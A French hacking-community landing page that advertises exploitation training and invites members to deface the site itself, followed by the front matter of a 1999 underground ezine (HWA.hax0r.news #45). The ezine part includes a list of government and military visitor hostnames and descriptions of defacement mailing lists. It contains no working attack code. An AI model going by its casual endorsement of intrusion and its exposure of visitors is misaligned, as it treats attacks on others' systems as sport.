Plateforme de Hacking

HackBBS.org est une communauté faisant évoluer un système de services vulnérables.

Nous apprenons à exploiter de manière collaborative des solutions permettant de détourner les systèmes d'informations.
Cet apprentissage nous permet d'améliorer les technologies que nous utilisons et/ou de mieux comprendre l'ingénierie social.

Nous défendons les valeurs de l'entraide, du challenge personnel et contribuons modestement à rendre l'expérience des utilisateurs finaux la plus agréable possible.

Vous pouvez nous rencontrer via notre salon irc.
Le forum est en cours de remplacement par une version plus moderne, et tout aussi faillible que l'ancien ^^.
A ce jours nous enregistrons plusieurs dizaines de hack réussi contre notre site, et ce chiffre est en constante évolution. Merci a tous les contributeurs!

La refonte est en version alpha. Cette nouvelle plateforme permet de pentester à distance sans avoir son matériel à disposition.
Via l'exécution de scripts python connecté en websocket à l'ihm web, nous pouvons piloter le chargement de scénario
d'attaque/défense en "multijoueur" ^^.
Le système permet de charger des scripts de bibliothèques partagées et de chiffrer les échanges selon les modules déployés.
Vous trouverez dans la rubrique article de nombreux tutoriels afin de mieux comprendre la sécurité informatique,
ainsi que différents articles plus poussés.
Hacker
  • Sniffing
  • Cracking
  • Buffer overflow
  • Créations d'exploits
  • Social engineering
  • L'anonymat sur le web, spoofing
  • Bypass-proxy, Bypass-firewall
  • Injection de code SSI, SQL, etc...
  • Utilisation d'exploits, création de scripts(php, irc, perl)
Nous vous recommandons de sniffer votre réseau lors de votre navigation sur le site. La refonte vous fournira un outillage pour réaliser vos attaques/défenses.
Flux RSS

flux RSS d'HackBBS Abonnez-vous. Soyez prévenu des tournois, challenges, actualités, ...
Recevez nos dernières actualités sur notre flux RSS.



Challenges
Vous pourrez également participer à de nombreux challenges en constant renouvellement (si possible :p)
Dernièrement, les missions relativent aux derniers produits open sources marchent bien :)

Votre ultime challenge sera de défacer HackBBS. De nombreuses failles sont présentes. A vous de les trouver et de les exploiter.

Cet ultime test permettra de constater votre réactions face à une faille.
Black ou White? ^^

Ezine du moment: hwa-hn45.txt
      
      [63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  ==========================================================================
  =                       <=-[ HWA.hax0r.news ]-=>                         =
  ==========================================================================
    [=HWA'99/2000=]                   Number 45 Volume 1 1999   Dec 5th 99
  ==========================================================================
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  ==========================================================================
   
   "This newsletter/ezine has been Declassified for the phearing impaired"  
   
   
                    ____
                   / ___|_____   _____ _ __ __ _  __ _  ___
                  | |   / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \
                  | |__| (_) \ V /  __/ | | (_| | (_| |  __/
                   \____\___/ \_/ \___|_|  \__,_|\__, |\___|
                                                 |___/

                  This is #45 covering Nov 28th to Dec 5th. 
    
  ==========================================================================                             

                         "ABUSUS NON TOLLIT USUM"
                         
  ==========================================================================                         
    
   Mailing list members: 447 Can we bump this up somewhat? spread the word!                          
   
  ==========================================================================                          
   
  
        Today the spotlight may be on you, some interesting machines that
                  have accessed these archives recently...
               
                               _   _       _
                              | | | | ___ | |_
                              | |_| |/ _ \| __|
                              |  _  | (_) | |_
                              |_| |_|\___/ \__|
                               _    _ _ _
                              | |  | (_) |
                              | |__| |_| |_ ___
                              |  __  | | __/ __|
                              | |  | | | |_\__ \
                              |_|  |_|_|\__|___/
                              
                            .gov and .mil activity
                              
                             
                             
                             proxy.gintic.gov.sg
                             doegate.doe.gov
                             sunspot.gsfc.nasa.gov
                             gate1.mcbh.usmc.mil 
                             homer.nawcad.navy.mil
                             maggie.nawcad.navy.mil
                             lisa.nawcad.navy.mil 
                             msproxy.transcom.mil
                             b-kahuna.hickam.af.mil
                             sc034ws109.nosc.mil
                             infosec.se
                             gate2.mcbutler.usmc.mil
                             sc034ws109.nosc.mil
                             shq-ot-1178.nosc.mil
                             dhcp-036190.scott.af.mil
                             mcreed.lan.teale.ca.gov
                             dodo.nist.gov
                             mc1926.mcclellan.af.mil
                             kwai11.nsf.gov
                             enduser.faa.gov
                             vasfw02,fdic.gov 
                             lisa.defcen.gov.au
                             ps1.pbgc.gov
                             guardian.gov.sg
                             amccss229116.scott.af.mil
                             sc022ws224.nosc.mil
                             sheppard2.hurlburt.af.mil                             
                             marshall.us-state.gov
                             digger1.defence.gov.au
                             firewall.mendoza.gov.ar
                             ipaccess.gov.ru
                             gatekeeper.itsec-debis.de
                             fgoscs.itsec-debis.de
                             fhu-ed4ccdf.fhu.disa.mil
                             citspr.tyndall.af.mil
                             kelsatx2.kelly.af.mil
                             kane.sheppard.af.mil                             
                             relay5.nima.mil
                             host.198-76-34-33.gsa.gov
                             ntsrvr.vsw.navy.mil
                             saic2.nosc.mil
                             wygate.wy.blm.gov
                             mrwilson.lanl.gov
                             p722ar.npt.nuwc.navy.mil
                             ws088228.ramstein.af.mil
                             car-gw.defence.gov.au
                             unknown-c-23-147.latimes.com
                             nytgate1.nytimes.com
                             
                             
  There are some interesting machines among these, the *.nosc.mil boxes are
  from SPAWAR information warfare centres, good Is It Worth It Followup to see
  our boys keeping up with the news... - Ed                             
  
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                                            
  
  
  _   ___        ___      _                 ___
 | | | \ \      / / \    | |__   __ ___  __/ _ \ _ __ _ __   _____      _____
 | |_| |\ \ /\ / / _ \   | '_ \ / _` \ \/ / | | | '__| '_ \ / _ \ \ /\ / / __|
 |  _  | \ V  V / ___ \ _| | | | (_| |>  <| |_| | |_ | | | |  __/\ V  V /\__ \
 |_| |_|  \_/\_/_/   \_(_)_| |_|\__,_/_/\_\\___/|_(_)|_| |_|\___| \_/\_/ |___/

  
                             
                             
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                                            
  
                     http://welcome.to/HWA.hax0r.news/                     
                                           
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                                            
  
  
  @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ 
  #                                                                         #
  @      The HWA website is sponsored by CUBESOFT communications I highly   @ 
  #      recommend you consider these people for your web hosting needs,    #
  @                                                                         @   
  #      Web site sponsored by CUBESOFT networks http://www.csoft.net       #
  @      check them out for great fast web hosting!                         @ 
  #                                                                         # 
  #      http://www.csoft.net/~hwa                                          @
  @                                                                         #  
  @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
                    
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       


          _   _            _             _    _____ _   _     _
         | | | | __ _  ___| | _____ _ __( )__| ____| |_| |__ (_) ___
         | |_| |/ _` |/ __| |/ / _ \ '__|/ __|  _| | __| '_ \| |/ __|
         |  _  | (_| | (__|   <  __/ |   \__ \ |___| |_| | | | | (__
         |_| |_|\__,_|\___|_|\_\___|_|   |___/_____|\__|_| |_|_|\___|



     Sadly, due to the traditional ignorance and sensationalizing of the mass
     media, the once-noble term hacker has become a perjorative.
     
     Among true computer people, being called a hacker is a compliment. One of
     the traits of the true hacker is a profoundly antibureaucratic and
     democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
     
     This ethic was best formulated by Steven Levy in his 1984 book Hackers:
     Heroes of the Computer Revolution. Its tenets are as follows:

      1 - Access to computers should be unlimited and total. 
      2 - All information should be free. 
      3 - Mistrust authority - promote decentralization. 
      4 - Hackers should be judged by their hacking not bogus criteria such as
          degrees, age, race, or position. 
      5 - You create art and beauty on a computer, 
      6 - Computers can change your life for the better. 

     The Internet as a whole reflects this ethic.


  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       


             _____                          _   _   _
            |  ___|__  _ __ _ __ ___   __ _| |_| |_(_)_ __   __ _
            | |_ / _ \| '__| '_ ` _ \ / _` | __| __| | '_ \ / _` |
            |  _| (_) | |  | | | | | | (_| | |_| |_| | | | | (_| |
            |_|  \___/|_|  |_| |_| |_|\__,_|\__|\__|_|_| |_|\__, |
                                                            |___/

               A Comment on FORMATTING: 
               
               
               Oct'99 - Started 80 column mode format, code is still left
                        untouched since formatting will destroy syntax.               
               
   
               I received an email recently about the formatting of this
               newsletter, suggesting that it be formatted to 75 columns
               in the past I've endevoured to format all text to 80 cols
               except for articles and site statements and urls which are
               posted verbatim, I've decided to continue with this method
               unless more people complain, the zine is best viewed in
               1024x768 mode with UEDIT.... - Ed
               
               BTW if anyone can suggest a better editor than UEDIT for
               this thing send me some email i'm finding it lacking in
               certain areas. Must be able to produce standard ascii.    
                       
  
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
  
                       __  __ _
                      |  \/  (_)_ __ _ __ ___  _ __ ___
                      | |\/| | | '__| '__/ _ \| '__/ __|
                      | |  | | | |  | | | (_) | |  \__ \
                      |_|  |_|_|_|  |_|  \___/|_|  |___/

                       


     New mirror sites
                
          ***   http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ ***      
                http://datatwirl.intranova.net * NEW * 
                http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
                http://net-security.org/hwahaxornews
                http://www.sysbreakers.com/hwa
                http://www.attrition.org/hosted/hwa/
                http://www.ducktank.net/hwa/issues.html.          
                http://hwazine.cjb.net/
                http://www.hackunlimited.com/files/secu/papers/hwa/
                http://www.attrition.org/~modify/texts/zines/HWA/       
                         
              * http://hwa.hax0r.news.8m.com/           
              * http://www.fortunecity.com/skyscraper/feature/103/  
               
              * Crappy free sites but they offer 20M & I need the space...
              ** Some issues are not located on these sites since they exceed
                 the file size limitations imposed by the sites :-( please
                 only use these if no other recourse is available.
                 
            *** Most likely to be up to date other than the main site.    
                        
                        
     
     HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
     thanks to airportman for the Cubesoft bandwidth. Also shouts out to all 
     our mirror sites! and p0lix for the (now expired) digitalgeeks archive
     tnx guys. 
     
     http://www.csoft.net/~hwa
     
     
     HWA.hax0r.news Mirror Sites:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
     http://www.attrition.org/hosted/hwa/
     http://www.attrition.org/~modify/texts/zines/HWA/
     http://www.ducktank.net/hwa/issues.html. ** NEW **
     http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
     http://www.csoft.net/~hwa/ 
     http://www.digitalgeeks.com/hwa. *DOWN*
     http://members.tripod.com/~hwa_2k
     http://welcome.to/HWA.hax0r.news/
     http://www.attrition.org/~modify/texts/zines/HWA/
     http://www.projectgamma.com/archives/zines/hwa/
     http://www.403-security.org/Htmls/hwa.hax0r.news.htm

   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=         
   
   
  
 
                    ____                              _
                   / ___| _   _ _ __   ___  _ __  ___(_)___
                   \___ \| | | | '_ \ / _ \| '_ \/ __| / __|
                    ___) | |_| | | | | (_) | |_) \__ \ \__ \
                   |____/ \__, |_| |_|\___/| .__/|___/_|___/
                          |___/            |_|

     
   
   SYNOPSIS (READ THIS)
   --------------------
   
   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see. (remember i'm doing
   this for me, not you, the fact some people happen to get a kick/use
   out of it is of secondary importance).

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended  however, to  compliment such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, its a labour
   of love and will be continued for as long as I feel like it, i'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... 
   
   

   @HWA

   =-----------------------------------------------------------------------=

                     Welcome to HWA.hax0r.news ... #44

   =-----------------------------------------------------------------------=


    
    We could use some more people joining the channel, its usually pretty
    quiet, we don't bite (usually) so if you're hanging out on irc stop
    by and idle a while and say hi...   
    
    **************************************************************************   

   
                            ____|  _|            |
                            __|   |   __ \   _ \ __|
                            |     __| |   |  __/ |
                           _____|_|  _|  _|\___|\__| 

     
                        Eris Free Net #HWA.hax0r.news
    
    **************************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed   ***
    ***                                                                    ***
    *** please join to discuss or impart news on from the zine and around  ***
    *** the zine or just to hang out, we get some interesting visitors you ***
    *** could be one of em.                                                ***
    ***                                                                    ***
    *** Note that the channel isn't there to entertain you its purpose is  ***
    *** to bring together people interested and involved in the underground***
    *** to chat about current and recent events etc, do drop in to talk or ***
    *** hangout. Also if you want to promo your site or send in news tips  ***
    *** its the place to be, just remember we're not #hack or #chatzone... ***
    **************************************************************************

      
    
    


  =--------------------------------------------------------------------------=
  
  
                     _____            _             _  
                    / ____|          | |           | |
                   | |     ___  _ __ | |_ ___ _ __ | |_ ___
                   | |    / _ \| '_ \| __/ _ \ '_ \| __/ __|
                   | |___| (_) | | | | ||  __/ | | | |_\__ \
                    \_____\___/|_| |_|\__\___|_| |_|\__|___/


           
  =--------------------------------------------------------------------------=
  [ INDEX ]
  =--------------------------------------------------------------------------=
    Key     Intros                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. COPYRIGHTS ......................................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. SOURCES .........................................................
    00.3  .. THIS IS WHO WE ARE ..............................................
    00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
    00.5  .. THE HWA_FAQ V1.0 ................................................
            
             ABUSUS NON TOLLIT USUM? 
             This is (in case you hadn't guessed) Latin, and loosely translated
             it means "Just because something is abused, it should not be taken
             away from those  who use it properly). This is our new motto.         

  =--------------------------------------------------------------------------=
    Key     Content 
  =--------------------------------------------------------------------------=
  

    01.0  .. GREETS ..........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ...........................
     01.2 .. Mailbag .........................................................
    02.0  .. From the Editor.................................................. 
    03.0  .. Yes It Is (Worth It) ............................................
    04.0  .. ExplorerZip Shrinks, Becomes MiniZip ............................
    05.0  .. Staples Files Suit Against Unknown Defacer ......................
    06.0  .. Comet bows to consumer pressure..................................
    07.0  .. Personal Info of Canadian ISP Users Leaked ......................
    08.0  .. First Internet Piracy Case in Japan .............................
    09.0  .. FBI Launches InfraGuard in Ohio .................................
    10.0  .. National Gun Database Goes Online ...............................
    11.0  .. Zero Knowledge Ships Freedom, Finally ...........................
    12.0  .. OpenBSD 2.6 Ships ...............................................
    13.0  .. Videon Was Warned of Data Loss ..................................
    14.0  .. German Digital Signature Chip Broke .............................
    15.0  .. IETF Members Under Investigation For Treason ....................
    16.0  .. Jane's Releases Cyberterrorism Report ...........................
    17.0  .. Car Radio Listening Habits Being Gathered .......................
    18.0  .. CVE by Mitre Goes Online ........................................
    19.0  .. Novell Head Victim of Online Credit Card Theft ..................
    20.0  .. IDC Says E-Commerce Unsafe Most of the Time .....................
    21.0  .. Attack Trees Help to Model Security Threats .....................
    22.0  .. Pandora Updated .................................................
    23.0  .. [sSh] Busted or Not?  ...........................................
    24.0  .. Response to Freedom Extraordinary ...............................
    25.0  .. DCypher.net Team Created ........................................
    26.0  .. Hackers Make it to Mars .........................................
    27.0  .. Security Focus newsletter #17....................................
    28.0  .. SQL 7 "Magic Packet" DoS.........................................
    
    =-------------------------------------------------------------------------------=
    
        
    AD.S  .. Post your site ads or etc here, if you can offer something in return
             thats tres cool, if not we'll consider ur ad anyways so send it in.
             ads for other zines are ok too btw just mention us in yours, please
             remember to include links and an email contact. Corporate ads will
             be considered also and if your company wishes to donate to or 
             participate in the upcoming Canc0n99 event send in your suggestions
             and ads now...n.b date and time may be pushed back join mailing list
             for up to date information.......................................
             Current dates: POSTPONED til further notice, place: TBA..........
    Ha.Ha .. Humour and puzzles  ............................................
             
              Hey You!........................................................
              =------=........................................................
              
              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)...........................................

    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
     A.1   .. PHACVW linx and references......................................
 
  =--------------------------------------------------------------------------=
     
     @HWA'99
     
     

     
 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      
                            _                     _
                           | |    ___  __ _  __ _| |
                           | |   / _ \/ _` |/ _` | |
                           | |__|  __/ (_| | (_| | |
                           |_____\___|\__, |\__,_|_|
                                      |___/


          THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
          OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
          WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
          (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
          READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
     
          Important semi-legalese and license to redistribute:
     
          YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
          AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
          ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
          IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
          APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
          IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
          ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
          ME PRIVATELY current email cruciphux@dok.org
     
          THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
          WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
          THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
     
          I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
          AND REDISTRIBUTE/MIRROR. - EoD
     
     
          Although this file and all future issues are now copyright, some of
         the content holds its  own copyright and these are printed and
         respected. News is news so i'll print any and all news but will quote
         sources when the source is known, if its good enough for CNN its good
         enough for me. And i'm doing it for free on my own time so pfffft. :)
     
         No monies are made or sought through the distribution of this material.
         If you have a problem or concern email me and we'll discuss it.
     
         cruciphux@dok.org
     
         Cruciphux [C*:.]



 00.1 CONTACT INFORMATION AND MAIL DROP 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                     ____            _             _
                    / ___|___  _ __ | |_ __ _  ___| |_ ___
                   | |   / _ \| '_ \| __/ _` |/ __| __/ __|
                   | |__| (_) | | | | || (_| | (__| |_\__ \
                    \____\___/|_| |_|\__\__,_|\___|\__|___/


     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit
    thanks.

    Send all goodies to:
    

	    HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5
	    
	    
    
    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
    ~~~~~~~  reading this from some interesting places, make my day and get a
             mention in the zine, send in a postcard, I realize that some places
             it is cost prohibitive but if you have the time and money be a cool
             dude / gal and send a poor guy a postcard preferably one that has some
             scenery from your place of residence for my collection, I collect stamps
             too so you kill two birds with one stone by being cool and mailing in a
             postcard, return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.



    Ideas for interesting 'stuff' to send in apart from news:

    - Photo copies of old system manual front pages (optionally signed by you) ;-)
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. 
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.
    
    
    Stuff you can email:
    
    - Prank phone calls in .ram or .mp* format
    - Fone tones and security announcements from PBX's etc
    - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
    - reserved for one smiley face ->        :-)            <-
    - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
    - burns of phac cds (email first to make sure we don't already have em)
    - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
    

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it 

    Our current email:

    Submissions/zine gossip.....: hwa@press.usmc.net
    Private email to editor.....: cruciphux@dok.org                                                                   
    Distribution/Website........: sas2@usa.net       

    @HWA



 00.2 Sources ***
      ~~~~~~~~~~~
      
                      ____
                     / ___|  ___  _   _ _ __ ___ ___ ___
                     \___ \ / _ \| | | | '__/ __/ _ Y __|
                      ___) | (_) | |_| | | | (_|  __|__ \
                     |____/ \___/ \__,_|_|  \___\___|___/


     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.

    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
    News site (HNN) .....,............http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
    NewsTrolls .(daily news ).........http://www.newstrolls.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+Security................http://www.gammaforce.org/
    News site+Security................http://www.projectgamma.com/
    News site+Security................http://securityhole.8m.com/
    News site+Security related site...http://www.403-security.org/ s
    News/Humour site+ ................http://www.innerpulse.com
    News/Techie news site.............http://www.slashdot.org
    
    

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see
     http://www.hackernews.com/affiliates.html as they seem to be popping up
     rather frequently ...

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    <+others>

    NEWS Agencies, News search engines etc:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    http://www.cnn.com/SEARCH/
       
    http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
        
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
        
    http://www.ottawacitizen.com/business/
        
    http://search.yahoo.com.sg/search/news_sg?p=hack
        
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
        
    http://www.zdnet.com/zdtv/cybercrime/
        
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
        
    NOTE: See appendices for details on other links.
    


    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
        
    http://freespeech.org/eua/ Electronic Underground Affiliation
        
    http://ech0.cjb.net ech0 Security
    
    http://axon.jccc.net/hir/ Hackers Information Report
        
    http://net-security.org Net Security
        
    http://www.403-security.org Daily news and security related site
        

    Submissions/Hints/Tips/Etc
    ~~~~~~~~~~~~~~~~~~~~~~~~~~
    
            ____        _               _         _
           / ___| _   _| |__  _ __ ___ (_)___ ___(_) ___  _ __  ___
           \___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __|
            ___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \
           |____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/


    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care wether the article/email is to be used in an issue
    or not and may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed

    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
    
    
    ATTRITION.ORG's Website defacement mirror and announcement lists
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    http://www.attrition.org/mirror/attrition/    
    http://www.attrition.org/security/lists.html
    
    --
      
      defaced [web page defacement announce list]
      
      This is a public LOW VOLUME (1) mail list to circulate news/info on 
      defaced web sites. To subscribe to Defaced, send mail to 
      majordomo@attrition.org with "subscribe defaced" in the BODY of 
      the mail.
      
      There will be two types of posts to this list:
      
              1. brief announcements as we learn of a web defacement.
                 this will include the site, date, and who signed the 
                 hack. we will also include a URL of a mirror of the hack.
      
              2. at the end of the day, a summary will be posted
                 of all the hacks of the day. these can be found
                 on the mirror site listed under 'relevant links'
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: mcintyre@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
      
      (1) It is low volume on a normal day. On days of many defacements,
          traffic may be increased. On a few days, it is a virtual mail
          flood. You have been warned. ;)
      
    -=-
    
    --
      
      defaced summary [web page defacement announce list]
      
      This is a low traffic mail list to announce all publicly
      defaced domains on a given day. To subscribe to Defaced-Summary, send mail to 
      majordomo@attrition.org with "subscribe defaced-summary" in the BODY of 
      the mail.
      
      There will be ONE type of post to this list:
      
              1. a single nightly piece of mail listing all reported
                 domains. the same information can be found on
                 http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
              
              
     -=-
     
      defaced GM [web page defacement announce list]
      
      This is a low traffic mail list to announce all publicly
      defaced government and military domains on a given day. To subscribe to 
      Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm" 
      in the BODY of the mail.
      
      There will be ONE type of post to this list:
      
              1. sporadic pieces of mail for each government (.gov)
                 or military (.mil) system defaced. the same information 
                 can be found on http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is designed primarily for government and military
      personell charged with tracking security incidents on
      government run networks.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
              
     
      --
      
      defaced alpha [web page defacement announce list]
      
      This is a low traffic mail list to announce via alpha-numeric
      pagers, all publicly defaced government and military domains 
      on a given day. To subscribe to Defaced-Alpha, send mail to 
      majordomo@attrition.org with "subscribe defaced-alpha" in 
      the BODY of the mail.
      
      There will be ONE type of post to this list:
      
              1. sporadic pieces of mail for each government (.gov)
                 or military (.mil) system defaced. the information
                 will only include domain names. the same information 
                 can be found on http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is designed primarily for government and military
